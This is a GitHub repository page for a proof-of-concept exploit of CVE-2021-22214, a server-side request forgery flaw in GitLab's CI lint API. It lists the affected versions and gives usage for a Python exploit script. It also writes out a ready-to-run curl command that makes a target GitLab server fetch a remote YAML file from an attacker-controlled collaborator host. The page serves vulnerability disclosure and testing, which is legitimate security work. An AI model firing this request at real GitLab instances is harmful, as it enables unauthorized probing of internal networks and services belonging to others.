Skip to content

kh4sh3i/GitLab-SSRF-CVE-2021-22214

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
GitLab_SSRF.py
GitLab_SSRF.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
ssrf.png
ssrf.png
 
 

Repository files navigation

CVE-2021-22214

POC for CVE-2021-22214: Gitlab SSRF

Description

The remote GitLab install contains a Server-side request forgery (SSRF) vulnerability as a result of the internal network for webhooks being enabled. A remote, unauthenticated attacker can exploit a registration-limited GitLab instance causing it to make HTTP requests to an arbitrary domain of the attacker's choosing.

usage

  • python code

    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>

  • Curl command

curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'

Affect

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

Reference

About

POC for CVE-2021-22214: Gitlab SSRF

kh4sh3i.ir/

Topics

git gitlab poc cve ssrf ssrf-payload ssrf-tool

Resources

Readme

License

CC0-1.0 license
Activity

Stars

3 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages